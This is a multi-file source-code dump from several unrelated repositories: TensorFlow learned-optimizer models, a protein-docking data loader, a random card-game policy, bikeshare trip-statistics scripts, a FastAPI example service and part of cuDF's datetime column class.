dataset = tf.data.Dataset.from_tensor_slices(data)
if input_context:
dataset = dataset.shard(input_context.num_input_pipelines,
input_context.input_pipeline_id)
dataset = dataset.cache()
return process_record_dataset(
dataset=dataset,
is_training=is_training,
batch_size=batch_size,
# shuffle_buffer=_SHUFFLE_BUFFER if task == 'sc' else 400000,
shuffle_buffer=shuffle_buffer,
drop_remainder=drop_remainder,
A=A)
```
#### File: Model_Base_L2O/models/lfista.py
```python
import numpy as np
from numpy import linalg as LA
import tensorflow.compat.v2 as tf
from tensorflow.compat.v2 import keras
from .utils import shrink_free
import math
class LfistaCell(keras.layers.Layer):
"""Lfista cell."""
def __init__(self,
A,
Wg,
Wm,
We,
theta,
layer_id,
name=None):
super(LfistaCell, self).__init__(name=name)
self._A = A.astype(np.float32)
self.Wg = Wg
self.Wm = Wm
self.We = We
self.theta = theta
self.layer_id = layer_id
self._M = self._A.shape[0]
self._N = self._A.shape[1]
def call(self, inputs):
# output = B * y
output = tf.matmul(inputs[:, :self._M], self.We, transpose_b=True)
# if the current layer is not the first layer, take the ouput of the
# last layer as the input.
if self.layer_id > 0:
inputs_ = inputs[:, -self._N:]
output += tf.matmul(inputs_, self.Wg, transpose_b=True)
if self.layer_id > 1:
prev_inputs_ = inputs[:, -self._N*2:-self._N]
output += tf.matmul(prev_inputs_, self.Wm, transpose_b=True)
output = shrink_free(output, self.theta)
return tf.concat([inputs, output], 1)
class Lfista(keras.Sequential):
"""Lfista model."""
def __init__(self,
A,
T,
lam,
share_W=False,
D=None,
name="Lfista"):
super(Lfista, self).__init__(name=name)
self._A = A.astype(np.float32)
self._T = int(T)
self._lam = lam
self.share_W = share_W
self._M = self._A.shape[0]
self._N = self._A.shape[1]
self._scale = 1.001 * np.linalg.norm(A, ord=2)**2
self._theta = (self._lam / self._scale).astype(np.float32)
self._B = (np.transpose(self._A) / self._scale).astype(np.float32)
_W = np.eye(self._N, dtype=np.float32) - np.matmul(self._B, self._A)
_tk = [1.0, 1.0]
self._mk = []
for i in range(self._T):
_tk.append((1 + math.sqrt(1 + 4*_tk[-1]**2.0)) / 2)
self._mk.append((_tk[-2] - 1) / _tk[-1])
self._Wg = [
tf.Variable(_W * (1 + self._mk[i]), trainable=True, name=name + "_Wg" + str(i + 1))
for i in range(1, self._T)
]
self._Wm = [
tf.Variable(- self._mk[i] * _W, trainable=True, name=name + "_Wm" + str(i + 1))
for i in range(1, self._T)
]
self.theta = [
tf.Variable(
self._theta, trainable=True, name=name + "_theta" + str(i + 1))
for i in range(self._T)
]
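        # Note: the list multiplication below makes every layer share a single We
        # variable (T references to the same tf.Variable initialized from B).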
self._We = [
tf.Variable(self._B, trainable=True, name=name + "_We" + str(i + 1))
] * self._T
if D is not None:
self._D = D
self._W_D_constant = tf.Variable(self._D, trainable=False, name=name + "_W_D_constant")
self._W_D = tf.Variable(self._D, trainable=True, name=name + "_W_D")
else:
self._D = None
self._W_D = None
def create_cell(self, layer_id):
if layer_id != 0:
Wg = self._Wg[layer_id - 1]
Wm = self._Wm[layer_id - 1]
else:
Wg = None
Wm = None
if self._D is None:
w_d = self._W_D
F = 0
else:
F = self._D.shape[0]
if layer_id == self._T - 1:
w_d = self._W_D
else:
w_d = self._W_D_constant
We = self._We[layer_id]
cell = LfistaCell(self._A,
Wg,
Wm,
We,
self.theta[layer_id],
layer_id,
"Lfista_layer" + str(layer_id + 1))
self.add(cell)
```
#### File: Model_Base_L2O/models/utils.py
```python
import tensorflow.compat.v2 as tf
from tensorflow.compat.v2 import keras
import tensorflow_probability as tfp
def shrink(data, theta):
theta = keras.layers.ReLU()(theta)
return tf.sign(data) * keras.layers.ReLU()(tf.abs(data) - theta)
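# Unlike shrink, shrink_free does not clip theta to be non-negative, so a learned
# threshold may become negative.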
def shrink_free(data, theta):
return tf.sign(data) * keras.layers.ReLU()(tf.abs(data) - theta)
def shrink_lamp(r_, rvar_, lam_):
"""
Implementation of thresholding neuron in Learned AMP model.
"""
theta_ = tf.maximum(tf.sqrt(rvar_) * lam_, 0.0)
xh_ = tf.sign(r_) * tf.maximum(tf.abs(r_) - theta_, 0.0)
return xh_
def shrink_ss(inputs_, theta_, q, return_index=False):
"""
Special shrink that does not apply soft shrinkage to entries of top q%
magnitudes.
    :inputs_: input tensor.
    :theta_: soft-thresholding parameter.
    :q: percentage of largest-magnitude entries excluded from shrinkage.
    :returns: thresholded tensor (and the complementary index mask when return_index is True).
"""
abs_ = tf.abs(inputs_)
thres_ = tfp.stats.percentile(abs_, 100.0-q, axis=1, keepdims=True)
"""
    Entries that are greater than thresholds and in the top q% simultaneously
will be selected into the support, and thus will not be sent to the
shrinkage function.
"""
index_ = tf.logical_and(abs_ > theta_, abs_ > thres_)
index_ = tf.cast(index_, tf.float32)
"""Stop gradient at index_, considering it as constant."""
index_ = tf.stop_gradient(index_)
cindex_ = 1.0 - index_ # complementary index
output = (tf.multiply(index_, inputs_) +
shrink_free(tf.multiply(cindex_, inputs_), theta_ ))
if return_index:
return output, cindex_
else:
return output
```
#### File: Model_Free_L2O/L2O-DM and L2O-RNNProp/networks.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import sys
import dill as pickle
import numpy as np
import six
import sonnet as snt
import tensorflow as tf
import preprocess
def factory(net, net_options=(), net_path=None):
"""Network factory."""
net_class = getattr(sys.modules[__name__], net)
net_options = dict(net_options)
if net_path:
with open(net_path, "rb") as f:
net_options["initializer"] = pickle.load(f)
return net_class(**net_options)
def save(network, sess, filename=None):
"""Save the variables contained by a network to disk."""
to_save = collections.defaultdict(dict)
variables = snt.get_variables_in_module(network)
for v in variables:
split = v.name.split(":")[0].split("/")
module_name = split[-2]
variable_name = split[-1]
to_save[module_name][variable_name] = v.eval(sess)
if filename:
with open(filename, "wb") as f:
pickle.dump(to_save, f)
return to_save
@six.add_metaclass(abc.ABCMeta)
class Network(snt.RNNCore):
"""Base class for meta-optimizer networks."""
@abc.abstractmethod
def initial_state_for_inputs(self, inputs, **kwargs):
"""Initial state given inputs."""
pass
def _convert_to_initializer(initializer):
"""Returns a TensorFlow initializer.
* Corresponding TensorFlow initializer when the argument is a string (e.g.
"zeros" -> `tf.zeros_initializer`).
* `tf.constant_initializer` when the argument is a `numpy` `array`.
* Identity when the argument is a TensorFlow initializer.
Args:
initializer: `string`, `numpy` `array` or TensorFlow initializer.
Returns:
TensorFlow initializer.
"""
if isinstance(initializer, str):
return getattr(tf, initializer + "_initializer")(dtype=tf.float32)
elif isinstance(initializer, np.ndarray):
return tf.constant_initializer(initializer)
else:
return initializer
def _get_initializers(initializers, fields):
"""Produces a nn initialization `dict` (see Linear docs for a example).
Grabs initializers for relevant fields if the first argument is a `dict` or
reuses the same initializer for all fields otherwise. All initializers are
processed using `_convert_to_initializer`.
Args:
initializers: Initializer or <variable, initializer> dictionary.
fields: Fields nn is expecting for module initialization.
Returns:
nn initialization dictionary.
"""
result = {}
for f in fields:
if isinstance(initializers, dict):
if f in initializers:
# Variable-specific initializer.
result[f] = _convert_to_initializer(initializers[f])
else:
      # Common initializer for all variables.
result[f] = _convert_to_initializer(initializers)
return result
def _get_layer_initializers(initializers, layer_name, fields):
"""Produces a nn initialization dictionary for a layer.
Calls `_get_initializers using initializers[layer_name]` if `layer_name` is a
valid key or using initializers otherwise (reuses initializers between
layers).
Args:
initializers: Initializer, <variable, initializer> dictionary,
<layer, initializer> dictionary.
layer_name: Layer name.
fields: Fields nn is expecting for module initialization.
Returns:
nn initialization dictionary.
"""
# No initializers specified.
if initializers is None:
return None
# Layer-specific initializer.
if isinstance(initializers, dict) and layer_name in initializers:
return _get_initializers(initializers[layer_name], fields)
return _get_initializers(initializers, fields)
class StandardDeepLSTM(Network):
"""LSTM layers with a Linear layer on top."""
def __init__(self, output_size, layers, preprocess_name="identity",
preprocess_options=None, scale=1.0, initializer=None,
name="deep_lstm", tanh_output=False):
"""Creates an instance of `StandardDeepLSTM`.
Args:
output_size: Output sizes of the final linear layer.
layers: Output sizes of LSTM layers.
preprocess_name: Gradient preprocessing class name (in `l2l.preprocess` or
tf modules). Default is `tf.identity`.
preprocess_options: Gradient preprocessing options.
scale: Gradient scaling (default is 1.0).
initializer: Variable initializer for linear layer. See `snt.Linear` and
`snt.LSTM` docs for more info. This parameter can be a string (e.g.
"zeros" will be converted to tf.zeros_initializer).
name: Module name.
"""
super(StandardDeepLSTM, self).__init__(name=name)
self._output_size = output_size
self._scale = scale
self._preprocess_name = preprocess_name
if preprocess_name == 'fc':
with tf.variable_scope(self._template.variable_scope):
init = _get_layer_initializers(initializer, "input_projection", ("w", "b"))
self._preprocess = snt.Linear(preprocess_options["dim"], name="input_projection", initializers=init)
elif hasattr(preprocess, preprocess_name):
preprocess_class = getattr(preprocess, preprocess_name)
self._preprocess = preprocess_class(initializer, **preprocess_options)
else:
self._preprocess = getattr(tf, preprocess_name)
with tf.variable_scope(self._template.variable_scope):
self._cores = []
for i, size in enumerate(layers, start=1):
name = "lstm_{}".format(i)
init = _get_layer_initializers(initializer, name,
("w_gates", "b_gates"))
self._cores.append(snt.LSTM(size, name=name, initializers=init))
self._rnn = snt.DeepRNN(self._cores, skip_connections=False,
name="deep_rnn")
init = _get_layer_initializers(initializer, "linear", ("w", "b"))
self._linear = snt.Linear(output_size, name="linear", initializers=init)
self.tanh_output = tanh_output
def _build(self, inputs, prev_state):
"""Connects the `StandardDeepLSTM` module into the graph.
Args:
inputs: 2D `Tensor` ([batch_size, input_size]).
prev_state: `DeepRNN` state.
Returns:
`Tensor` shaped as `inputs`.
"""
# Adds preprocessing dimension and preprocess.
if self._preprocess_name == "fc":
inputs = tf.nn.elu(self._preprocess(inputs))
else:
inputs = self._preprocess(tf.expand_dims(inputs, -1))
# Incorporates preprocessing into data dimension.
inputs = tf.reshape(inputs, [inputs.get_shape().as_list()[0], -1])
output, next_state = self._rnn(inputs, prev_state)
final_output = self._linear(output)
if self.tanh_output:
return tf.nn.tanh(final_output) * self._scale, next_state
else:
return final_output * self._scale, next_state
def initial_state_for_inputs(self, inputs, **kwargs):
batch_size = inputs.get_shape().as_list()[0]
return self._rnn.initial_state(batch_size, **kwargs)
class CoordinateWiseDeepLSTM(StandardDeepLSTM):
"""Coordinate-wise `DeepLSTM`."""
def __init__(self, name="cw_deep_lstm", **kwargs):
"""Creates an instance of `CoordinateWiseDeepLSTM`.
Args:
name: Module name.
**kwargs: Additional `DeepLSTM` args.
"""
super(CoordinateWiseDeepLSTM, self).__init__(1, name=name, **kwargs)
def _reshape_inputs(self, inputs):
return tf.reshape(inputs, [-1, 1])
def _build(self, inputs, prev_state):
"""Connects the CoordinateWiseDeepLSTM module into the graph.
Args:
inputs: Arbitrarily shaped `Tensor`.
prev_state: `DeepRNN` state.
Returns:
`Tensor` shaped as `inputs`.
"""
input_shape = inputs.get_shape().as_list()
reshaped_inputs = self._reshape_inputs(inputs)
build_fn = super(CoordinateWiseDeepLSTM, self)._build
output, next_state = build_fn(reshaped_inputs, prev_state)
# Recover original shape.
return tf.reshape(output, input_shape), next_state
def initial_state_for_inputs(self, inputs, **kwargs):
reshaped_inputs = self._reshape_inputs(inputs)
return super(CoordinateWiseDeepLSTM, self).initial_state_for_inputs(
reshaped_inputs, **kwargs)
class RNNprop(StandardDeepLSTM):
def __init__(self, name="RNNprop", **kwargs):
super(RNNprop, self).__init__(1, name=name, **kwargs)
def _reshape_inputs(self, inputs):
return tf.reshape(inputs, [-1, 2])
def _build(self, m, g, prev_state):
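    # Stack the two per-coordinate inputs (m, g) on the last axis, run them
    # coordinate-wise through the shared LSTM, then restore g's original shape.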
output_shape = g.get_shape().as_list()
inputs = tf.concat([tf.expand_dims(m, -1), tf.expand_dims(g, -1)], axis=-1)
reshaped_inputs = self._reshape_inputs(inputs)
build_fn = super(RNNprop, self)._build
output, next_state = build_fn(reshaped_inputs, prev_state)
# Recover original shape.
return tf.reshape(output, output_shape), next_state
def initial_state_for_inputs(self, inputs, **kwargs):
reshaped_inputs = tf.reshape(inputs, [-1, 1])
return super(RNNprop, self).initial_state_for_inputs(
reshaped_inputs, **kwargs)
class KernelDeepLSTM(StandardDeepLSTM):
"""`DeepLSTM` for convolutional filters.
The inputs are assumed to be shaped as convolutional filters with an extra
preprocessing dimension ([kernel_w, kernel_h, n_input_channels,
n_output_channels]).
"""
def __init__(self, kernel_shape, name="kernel_deep_lstm", **kwargs):
"""Creates an instance of `KernelDeepLSTM`.
Args:
kernel_shape: Kernel shape (2D `tuple`).
name: Module name.
**kwargs: Additional `DeepLSTM` args.
"""
self._kernel_shape = kernel_shape
output_size = np.prod(kernel_shape)
super(KernelDeepLSTM, self).__init__(output_size, name=name, **kwargs)
def _reshape_inputs(self, inputs):
transposed_inputs = tf.transpose(inputs, perm=[2, 3, 0, 1])
return tf.reshape(transposed_inputs, [-1] + self._kernel_shape)
def _build(self, inputs, prev_state):
"""Connects the KernelDeepLSTM module into the graph.
Args:
inputs: 4D `Tensor` (convolutional filter).
prev_state: `DeepRNN` state.
Returns:
`Tensor` shaped as `inputs`.
"""
input_shape = inputs.get_shape().as_list()
reshaped_inputs = self._reshape_inputs(inputs)
build_fn = super(KernelDeepLSTM, self)._build
output, next_state = build_fn(reshaped_inputs, prev_state)
transposed_output = tf.transpose(output, [1, 0])
# Recover original shape.
return tf.reshape(transposed_output, input_shape), next_state
def initial_state_for_inputs(self, inputs, **kwargs):
"""Batch size given inputs."""
reshaped_inputs = self._reshape_inputs(inputs)
return super(KernelDeepLSTM, self).initial_state_for_inputs(
reshaped_inputs, **kwargs)
class Sgd(Network):
"""Identity network which acts like SGD."""
def __init__(self, learning_rate=0.001, name="sgd"):
"""Creates an instance of the Identity optimizer network.
Args:
learning_rate: constant learning rate to use.
name: Module name.
"""
super(Sgd, self).__init__(name=name)
self._learning_rate = learning_rate
def _build(self, inputs, _):
return -self._learning_rate * inputs, []
def initial_state_for_inputs(self, inputs, **kwargs):
return []
def _update_adam_estimate(estimate, value, b):
return (b * estimate) + ((1 - b) * value)
def _debias_adam_estimate(estimate, b, t):
return estimate / (1 - tf.pow(b, t))
class Adam(Network):
"""Adam algorithm (https://arxiv.org/pdf/1412.6980v8.pdf)."""
def __init__(self, learning_rate=1e-3, beta1=0.9, beta2=0.999, epsilon=1e-8,
name="adam"):
"""Creates an instance of Adam."""
super(Adam, self).__init__(name=name)
self._learning_rate = learning_rate
self._beta1 = beta1
self._beta2 = beta2
self._epsilon = epsilon
def _build(self, g, prev_state):
"""Connects the Adam module into the graph."""
b1 = self._beta1
b2 = self._beta2
g_shape = g.get_shape().as_list()
g = tf.reshape(g, (-1, 1))
t, m, v = prev_state
t_next = t + 1
m_next = _update_adam_estimate(m, g, b1)
m_hat = _debias_adam_estimate(m_next, b1, t_next)
v_next = _update_adam_estimate(v, tf.square(g), b2)
v_hat = _debias_adam_estimate(v_next, b2, t_next)
update = -self._learning_rate * m_hat / (tf.sqrt(v_hat) + self._epsilon)
return tf.reshape(update, g_shape), (t_next, m_next, v_next)
def initial_state_for_inputs(self, inputs, dtype=tf.float32, **kwargs):
batch_size = int(np.prod(inputs.get_shape().as_list()))
t = tf.zeros((), dtype=dtype)
m = tf.zeros((batch_size, 1), dtype=dtype)
v = tf.zeros((batch_size, 1), dtype=dtype)
return (t, m, v)
```
#### File: L2O-Swarm/src/dataloader.py
```python
import numpy as np
#import pdb
def data_loader():
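    # For every protein in train_list and each of its first 5 ligand poses, load the
    # initial coordinates, build pairwise q/e/r matrices from the corresponding 1-D
    # arrays, and load the normal-mode basis vectors and eigenvalues.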
scoor_init=[]
sq=[]
se=[]
sr=[]
sbasis=[]
seval=[]
protein_list = np.loadtxt("train_list", dtype='str')
for i in range(len(protein_list)):
#if(i+1 ==len(protein_list)):
# n=9
#else:
# n=6
n=6
for j in range(1,n):
x = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/coor_init")
q = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/q")
e = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/e")
r = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/r")
basis = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/basis")
eigval = np.loadtxt("data/"+protein_list[i]+'_'+str(j)+"/eigval")
#print (x.shape, q.shape, e.shape, r.shape, basis.shape, eigval.shape)
q=np.tile(q, (1, 1))
e=np.tile(e, (1,1))
q = np.matmul(q.T, q)
e = np.sqrt(np.matmul(e.T, e))
r = (np.tile(r, (len(r), 1)) + np.tile(r, (len(r), 1)).T)/2
scoor_init.append(x)
sq.append(q)
se.append(e)
sr.append(r)
sbasis.append(basis)
seval.append(eigval)
scoor_init = np.array(scoor_init)
sq = np.array(sq)
se = np.array(se)
sr = np.array(sr)
sbasis = np.array(sbasis)
seval = np.array(seval)
print (sq.shape, se.shape, seval.shape)
return scoor_init, sq, se, sr, sbasis, seval
if __name__ == "__main__":
data_loader()
```
#### File: L2O-Swarm/src/get_12basis.py
```python
import numpy as np
import os
path_protein_benchmark = "/home/cyppsp/project_bayesian/zdock/2c/"
protein_list = np.loadtxt("temp", dtype='str')
def c_normal_mode_analysis(protein, rpath, lpath, output):
os.system("cp "+rpath+" /home/cyppsp/cNMA/Example/Example1/Input/"+protein+'_r_u.pdb')
os.system("cp "+lpath+" /home/cyppsp/cNMA/Example/Example1/Input/"+protein+'_l_u.pdb')
os.system("/home/cyppsp/cNMA/Example/Example1/run_example1.sh "+protein)
os.system("cp /home/cyppsp/cNMA/Example/Example1/basis data/"+output)
os.system("cp /home/cyppsp/cNMA/Example/Example1/eigval data/"+output)
for i in range(len(protein_list)):
# ligand file
for j in range(1, 11):
os.system("mkdir data/"+protein_list[i]+'_'+str(j))
rpath="/home/cyppsp/project_bayesian/zdock/2c/"+protein_list[i]+"_r_u.pdb.ms"
lpath="/home/cyppsp/project_bayesian/zdock/2c/"+protein_list[i]+"_l_u_"+str(j)+".pdb"
c_normal_mode_analysis(protein_list[i], rpath, lpath, protein_list[i]+'_'+str(j))
``` |
{
"source": "JohnZ60/MTGMulligan",
"score": 3
} |
#### File: JohnZ60/MTGMulligan/random_policy.py
```python
import math
import random as random
def perform_random_main_phase_action(player, game):
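    # Random main-phase policy: pass with a small probability (or when no action is
    # available), otherwise play the first playable card or activate the first
    # activated ability, choosing between the two in proportion to their counts.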
passed = False
playable_indices = player.get_playable_cards()
callable_permanents, ability_indices = player.get_activated_abilities(game)
action_count = len(ability_indices) + len(playable_indices)
if action_count > 0:
tap_chance = (len(ability_indices) / float(action_count))
if random.random() < 0.01 or action_count == 0:
passed = True
elif random.random() > tap_chance:
player.play_card(playable_indices[0], game)
# pay randomly the generic mana cost of the card
while player.generic_debt > 0:
eligible_colors = player.get_nonempty_mana_colors()
player.pay_generic_debt(eligible_colors[random.randint(0, len(eligible_colors) - 1)])
else:
callable_permanents[0].use_tapped_ability(0)
return passed
def declare_random_attackers(player, game):
eligible_attackers = player.get_eligible_attackers(game)
attackers = []
for creature in eligible_attackers:
if random.random() < 0.5:
creature.is_attacking.append(creature.owner.get_opponent(game))
attackers.append(creature)
return attackers
def declare_random_blockers(player, attackers, game):
eligible_blockers = player.get_eligible_blockers(game)
blockers = []
for creature in eligible_blockers:
if random.random() < 0.5:
attacker_index = random.randint(0, len(attackers) - 1)
blocked_attacker = attackers[attacker_index]
creature.is_blocking.append(blocked_attacker)
blocked_attacker.is_blocked_by.append(creature)
blockers.append(creature)
return blockers
def assign_random_damage_assignment_orders(player, attackers, game):
for attacker in attackers:
order = math.factorial(len(attacker.is_blocked_by))
random_order = random.randint(0, order)
attacker.set_damage_assignment_order(random_order - 1)
def assign_damage_randomly(player, attacker):
for i in range(len(attacker.damage_assignment_order)):
blocker_i = attacker.damage_assignment_order[i]
remaining_health = blocker_i.toughness - blocker_i.damage_taken
if attacker.damage_to_assign < remaining_health or i == len(attacker.damage_assignment_order) - 1:
attacker.assign_damage(i, attacker.damage_to_assign)
break
else:
random_damage = random.randint(remaining_health, attacker.damage_to_assign)
attacker.assign_damage(i, random_damage)
if attacker.damage_to_assign == 0:
break
# delete these functions!
``` |
{
"source": "john-z-cheng/bikeshare",
"score": 3
} |
#### File: john-z-cheng/bikeshare/calculateStats.py
```python
import argparse
import psycopg2
import sys
import itertools
import statistics
import logging
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s - %(message)s')
def get_existing_trip_pairs(conn, member_type, minimum):
"""get existing trip_pairs based on member_type and a minimum
quantity of trips. The member_type values are:
Both, Casual, Registered"""
query = """SELECT tp.start_id, tp.stop_id, tp.distance,
tq.quantity, tq.trip_pair_id
FROM trip_pairs tp, trip_quantity tq
WHERE tp.id = tq.trip_pair_id AND tq.member_type=%s
AND tq.quantity > %s"""
with conn:
with conn.cursor() as cur:
params = (member_type, minimum)
cur.execute(query, params)
rows = cur.fetchall()
return rows
def calculate_stats(member_type, minimum):
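    """Compute duration statistics (currently the median) for every qualifying
    trip pair of the given member type and store them in trip_stats."""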
try:
conn = psycopg2.connect(dbname='gisdb', user='gisuser',
password='<PASSWORD>')
except:
print("Cannot connect to database")
sys.exit(1)
queryAll = """SELECT duration FROM trips
WHERE start_id=%s and stop_id=%s"""
queryByType = """SELECT duration FROM trips t, member_types m
WHERE start_id=%s and stop_id=%s AND
t.member_type_id=m.id AND m.type IN %s"""
pairList = get_existing_trip_pairs(conn, member_type, minimum)
logging.debug(len(pairList))
# convert the member_type to appropriate tuple for IN clause
if member_type == 'Both':
mType= ('Casual','Registered')
else:
mType = (member_type,)
with conn.cursor() as qCur:
for pair in pairList:
(start_id, stop_id, distance, quantity, pair_id) = pair
logging.debug((start_id, stop_id))
params = (start_id, stop_id, mType)
qCur.execute(queryByType, params)
rows = qCur.fetchall()
data = list(itertools.chain(*rows))
# calculate the stats
median = statistics.median(data)
# create the execute cursor
with conn.cursor() as eCur:
stmt = """DELETE FROM trip_stats WHERE trip_pair_id=%s
and conditions=%s"""
eParams = (pair_id, member_type)
eCur.execute(stmt, eParams)
stmt = """INSERT INTO trip_stats
(trip_pair_id, sample_size, conditions,
stat_name, stat_value) VALUES (%s, %s, %s, %s, %s)"""
eParams = (pair_id, quantity, member_type, 'median', median)
eCur.execute(stmt, eParams)
conn.commit()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--type', dest='member_type', default='Both', choices=['Both','Casual','Registered'], help='specify member type')
parser.add_argument('--minimum', type=int, default=400)
args = parser.parse_args()
calculate_stats(args.member_type, args.minimum)
```
#### File: john-z-cheng/bikeshare/createPostgresCopyData.py
```python
import psycopg2
import sys
import csv
import logging
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s - %(message)s')
def createMemberDict(conn):
"""build a dictionary of memberType IDs from database"""
memberDict = {}
with conn:
with conn.cursor() as cur:
cur.execute("SELECT id, type FROM member_types")
rows = cur.fetchall()
for row in rows:
(memberId, typeName) = row
memberDict[typeName] = memberId
return memberDict
def createDataFromCsv(inFile, outFile):
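    """Convert the 9-column trip CSV export into a tab-separated file suitable for
    a PostgreSQL COPY, mapping member type names to their database ids."""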
dataFile = open(outFile, 'w', newline='')
writer = csv.writer(dataFile,delimiter='\t')
reader = csv.reader(open(inFile,newline=''),delimiter=',')
# skip header row, but make sure it has 9 columns
header = next(reader)
if len(header) != 9:
print("Unexpected format")
print(header)
sys.exit(1)
# Sample CSV line in 9 column format
"""
Duration (ms),Start date,End date,Start station number,
Start station,End station number,End station,Bike #, Member type
257866,7/1/2015 0:00,7/1/2015 0:04,31116,California St & Florida Ave NW,31117,15th & Euclid St NW,W21516,Registered
"""
# only care about duration, times, stations, bike, and member type
try:
conn = psycopg2.connect(dbname='gisdb', user='gisuser',
password='<PASSWORD>')
except:
print("Cannot connect to database")
sys.exit(1)
memberDict = createMemberDict(conn)
line = 0
for row in reader:
(duration, start_date, stop_date,
start_station, start_station_name,
stop_station, stop_station_name,
bike, member_type) = row
bikeId = bike[1:] # drop leading letter W
memberId = memberDict[member_type]
outRow = [duration, start_date, stop_date, start_station, stop_station, bikeId, memberId]
writer.writerow(outRow)
if line % 10000 == 0:
logging.debug(row)
line += 1
dataFile.close()
return
if __name__ == "__main__":
try:
inFile = sys.argv[1]
except:
inFile = "trips.csv"
try:
outFile = sys.argv[2]
except:
outFile = "data.csv"
createDataFromCsv(inFile, outFile)
``` |
{
"source": "johnzech/self-destruct",
"score": 3
} |
#### File: self-destruct/example_api/example_api.py
```python
import sys
from typing import List, Optional
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
sys.path.append('..')
from utils.db import simple_query, delete_row, insert_row, update_row
tags_metadata = [
{
"name": "entrees",
"description": "Operations with entrees.",
},
]
app = FastAPI(
title="Bento API",
description="An example api built with FastAPI and Hypercorn",
version="1.0.0",
openapi_tags=tags_metadata
)
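# Typically served with an ASGI server such as Hypercorn, e.g. `hypercorn example_api:app`
# (the exact command is assumed from the project description, not taken from the repo).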
class NewEntree(BaseModel):
entree_name:str
class Entree(NewEntree):
entree_id:int
@app.get("/")
async def root():
return {"Hello": "World"}
@app.post('/entrees', response_model=Entree, status_code=201, tags=["entrees"])
async def create_entree(entree: NewEntree):
"""
Create an entree
- **entree_name**: each entree must have a name
"""
entree_id = insert_row("INSERT INTO test.entree (entree_name) VALUES (:entree_name) RETURNING entree_id", entree.dict())
return Entree(entree_id=entree_id, entree_name=entree.entree_name)
@app.get('/entrees', response_model=List[Entree], tags=["entrees"])
async def get_entrees():
"""
Get all of the entrees
"""
rows = simple_query('SELECT * FROM test.entree')
return rows
@app.get('/entree/{entree_id}', response_model=Entree, tags=["entrees"])
async def get_entree(entree_id):
"""
Get an entree by id
- **entree_id**: the unique id of the entree
"""
rows = simple_query('SELECT * FROM test.entree WHERE entree_id = :entree_id', {'entree_id': entree_id})
if (len(rows) == 0):
raise HTTPException(status_code=404, detail="Entree {} doesn't exist".format(entree_id))
else:
return rows[0]
@app.delete('/entree/{entree_id}', status_code=204, tags=["entrees"])
async def delete_entree(entree_id):
"""
Delete an entree
- **entree_id**: the unique id of the entree
"""
rowcount = delete_row('DELETE FROM test.entree WHERE entree_id = :entree_id', {'entree_id': entree_id})
if rowcount == 0:
raise HTTPException(status_code=404, detail="Entree {} doesn't exist".format(entree_id))
else:
return ''
@app.put('/entree/{entree_id}', response_model=Entree, status_code=201, tags=["entrees"])
async def update_entree(entree_id:int, entree: Entree):
"""
Update an entree
- **entree_id**: the unique id of the entree
- **entree_name**: update the name of the entree
"""
rowcount = update_row("UPDATE test.entree SET entree_name = :entree_name WHERE entree_id = :entree_id", entree.dict())
if (rowcount == 0):
raise HTTPException(status_code=404, detail="Entree {} doesn't exist".format(entree_id))
else:
return entree
``` |
{
"source": "JohnZed/cudf",
"score": 3
} |
#### File: core/column/datetime.py
```python
import datetime as dt
import numpy as np
import pandas as pd
import pyarrow as pa
import cudf._lib as libcudf
from cudf._lib.nvtx import annotate
from cudf.core.buffer import Buffer
from cudf.core.column import column
from cudf.utils import utils
from cudf.utils.dtypes import is_scalar, np_to_pa_dtype
# nanoseconds per time_unit
_numpy_to_pandas_conversion = {
"ns": 1,
"us": 1000,
"ms": 1000000,
"s": 1000000000,
"m": 60000000000,
"h": 3600000000000,
"D": 1000000000 * 86400,
}
class DatetimeColumn(column.ColumnBase):
def __init__(
self, data, dtype, mask=None, size=None, offset=0, null_count=None
):
"""
Parameters
----------
data : Buffer
The datetime values
dtype : np.dtype
The data type
mask : Buffer; optional
The validity mask
"""
dtype = np.dtype(dtype)
if data.size % dtype.itemsize:
raise ValueError("Buffer size must be divisible by element size")
if size is None:
size = data.size // dtype.itemsize
size = size - offset
super().__init__(
data,
size=size,
dtype=dtype,
mask=mask,
offset=offset,
null_count=null_count,
)
assert self.dtype.type is np.datetime64
self._time_unit, _ = np.datetime_data(self.dtype)
def __contains__(self, item):
# Handles improper item types
try:
item = np.datetime64(item, self._time_unit)
except Exception:
return False
return item.astype("int_") in self.as_numerical
@property
def time_unit(self):
return self._time_unit
@property
def year(self):
return self.get_dt_field("year")
@property
def month(self):
return self.get_dt_field("month")
@property
def day(self):
return self.get_dt_field("day")
@property
def hour(self):
return self.get_dt_field("hour")
@property
def minute(self):
return self.get_dt_field("minute")
@property
def second(self):
return self.get_dt_field("second")
@property
def weekday(self):
return self.get_dt_field("weekday")
def get_dt_field(self, field):
return libcudf.datetime.extract_datetime_component(self, field)
def normalize_binop_value(self, other):
if isinstance(other, dt.datetime):
other = np.datetime64(other)
if isinstance(other, pd.Timestamp):
m = _numpy_to_pandas_conversion[self.time_unit]
ary = utils.scalar_broadcast_to(
other.value * m, size=len(self), dtype=self.dtype
)
elif isinstance(other, np.datetime64):
other = other.astype(self.dtype)
ary = utils.scalar_broadcast_to(
other, size=len(self), dtype=self.dtype
)
else:
raise TypeError("cannot broadcast {}".format(type(other)))
return column.build_column(data=Buffer(ary), dtype=self.dtype)
@property
def as_numerical(self):
from cudf.core.column import build_column
return build_column(
data=self.base_data,
dtype=np.int64,
mask=self.base_mask,
offset=self.offset,
size=self.size,
)
def as_datetime_column(self, dtype, **kwargs):
dtype = np.dtype(dtype)
if dtype == self.dtype:
return self
return libcudf.unary.cast(self, dtype=dtype)
def as_numerical_column(self, dtype, **kwargs):
return self.as_numerical.astype(dtype)
def as_string_column(self, dtype, **kwargs):
from cudf.core.column import string
if len(self) > 0:
return string._numeric_to_str_typecast_functions[
np.dtype(self.dtype)
](self, **kwargs)
else:
return column.column_empty(0, dtype="object", masked=False)
def to_pandas(self, index=None):
return pd.Series(
self.to_array(fillna="pandas").astype(self.dtype), index=index
)
def to_arrow(self):
mask = None
if self.nullable:
mask = pa.py_buffer(self.mask_array_view.copy_to_host())
data = pa.py_buffer(self.as_numerical.data_array_view.copy_to_host())
pa_dtype = np_to_pa_dtype(self.dtype)
